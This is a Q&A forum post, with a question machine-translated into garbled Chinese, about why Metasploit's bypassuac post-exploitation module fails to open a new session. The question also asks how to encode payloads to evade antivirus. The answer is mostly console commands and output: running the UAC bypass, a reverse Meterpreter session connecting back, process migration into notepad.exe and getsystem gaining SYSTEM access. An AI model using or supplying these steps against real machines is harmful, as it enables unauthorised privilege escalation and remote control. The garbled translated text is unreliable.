metasploit:绕过hangs windows权限提升挂起

Question

对我来说，邮政/窗户/自动升级/旁路似乎失败了。

由于某些原因，我无法让后开发模块绕过some工作。我就是这样做的：

background

• Tried

1. 在目标机器上打开了一个计量器会话( NETWORKSERVICE用户)，
2. 将该会话放置在

中，以便使用如下所示的后利用模块：

使用post/windows/escalate/旁路set SESSION 1 set LHOST 192.168.1.100 set LPORT 4444利用

• ，端口尚未使用，因此应该可以。

• 输出如下：

- Handler未能绑定到192.168.1.100:4444 _ Started反向处理程序上的0.0.0.0:4444 _启动有效载荷处理程序._将旁路UAC可执行文件上载到文件系统._ Meterpreter stager可执行文件的长度为73802字节._将代理上载到文件系统._ Post模块执行completed

• Then它返回到控制台，什么也不做，没有新会话，什么也不做。

我检查了以下内容：

1. 手动将可执行文件绕过x86.exe上传到目标。无论病毒扫描器的警钟没有从可执行文件中敲响，fine.
2. Checked都能很好地工作。他们没有

是否有一种手动运行可执行文件的方法，有人能解释一下如何使用系统级访问打开新的meterpreter会话吗？

或者，我可以以某种方式编码有效载荷并使用我的自定义模板来规避所有防病毒的可能性吗？我还没有找到编码后开发模块的任何选项。

提前感谢

哈尔瓦尔

Answer 1

msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options

Module options:

Name Current Setting Required Description
—- ————— ——– ———–
RHOST no Host
RPORT 4444 no Port
SESSION yes The session to run this module on.

msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit

[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler…
[*] Uploading the bypass UAC executable to the filesystem…
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem….
[*] Executing the agent with endpoint 192.168.1.100:4444 with UACBypass in effect…
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.102:1565) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.102:1565) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process…
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)

msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > getsystem
…got system (via technique 1).
meterpreter > sysinfo